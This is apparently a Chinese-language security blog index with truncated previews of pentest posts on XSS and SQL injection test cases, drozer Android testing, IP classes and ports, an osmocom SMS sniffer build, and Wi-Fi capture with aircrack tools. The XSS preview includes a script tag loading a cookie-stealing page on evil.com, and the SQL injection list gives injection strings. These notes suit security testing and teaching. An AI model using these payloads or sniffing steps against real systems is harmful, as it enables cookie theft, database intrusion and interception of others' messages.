XSS测试用例


0x00

alert confirm prompt

0x01

<script>alert(1);</script>
<script>alert('XSS');</script>
<script src="http://www.evil.com/cookie.php"></script>
<script>location.href="http://www

Read more

SQL注入手工测试用例


0x00

1.数字型注入

'
1+1
3-1
value + 0
1 or 1=1
1) or (1=1
value or 1=2
value) or (1=1
1 and 1=2
1) and (1=2
1 or 'ab'='a'+'b'
1) or ('ab'='a'+'b'
1 or 'ab'='a''b'
1) or ('ab'='a''b'
1 or 'ab'='

Read more

利用drozer进行Android渗透测试


0x00

1.下载

官方地址
http://mwr.to/drozer

2.Android设备中安装agent.apk

adb install agent.apk

3.在PC上使用adb进行端口转发,转发到Drozer使用的端口31415

adb forward tcp:31415 tcp:31415

4.在Android设备上开启Drozer Agent,选择embedded server-enable

5.在PC上开启Drozer console

drozer console connect

0x01 测试步骤

1.获取包名

dz> run app.packa

Read more

IP段和常见端口


0x00

1.IP段

P地址根据网络号和主机号的数量而分为A、B、C三类。A类地址通常为大型网络而提供,全世界总共只有126个只可能的A类网络,每个A类网络最多可以连接16777214台主机。B类地址适用于中等规模的网络,全世界大约有16000个B类网络,每个B类网络最多可以连接65534台主机。C类地址适用于校园网等小型网络,每个C类网络最多可以有254台主机。
1.A类地址
(1)A类地址第1字节为网络地址,其它3个字节为主机地址。
(2)A类地址范围:1.0.0.1—126.255.255.254
(3)A类地址中的私有地址和保留地址:① 10.X.X.X是私有地址(所谓的私有地址就是在

Read more

SMS Sniffer


0x00

1.连接线与TTL的接法

黑/黄:GND
红:TX
白:RX

2.安装依赖包

sudo apt-get -y install libtool shtool autoconf git-core pkg-config make gcc

0x01

1.安装libosmocore源码包

cd /opt
git clone git://git.osmocom.org/libosmocore.git
cd libosmocore/ $ autoreconf -i $ ./configure
make $ sudo make install$ ldconfig
cd ..

2.安装交叉

Read more

无线审计


0x00

Kali

0x01

1.设置无线网卡为监听模式

iwconfig
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
iwconfig
airmon-ng check kill

2.用它抓包

airmon-ng start wlan0

monitor mode enabled on mon0

airodump-ng wlan0mon

3.CH:频道 BSSID:路由器MAC地址 接下来抓包

airodump-ng -c 11 -w test –bssid(路由器MAC) wlan0mo

Read more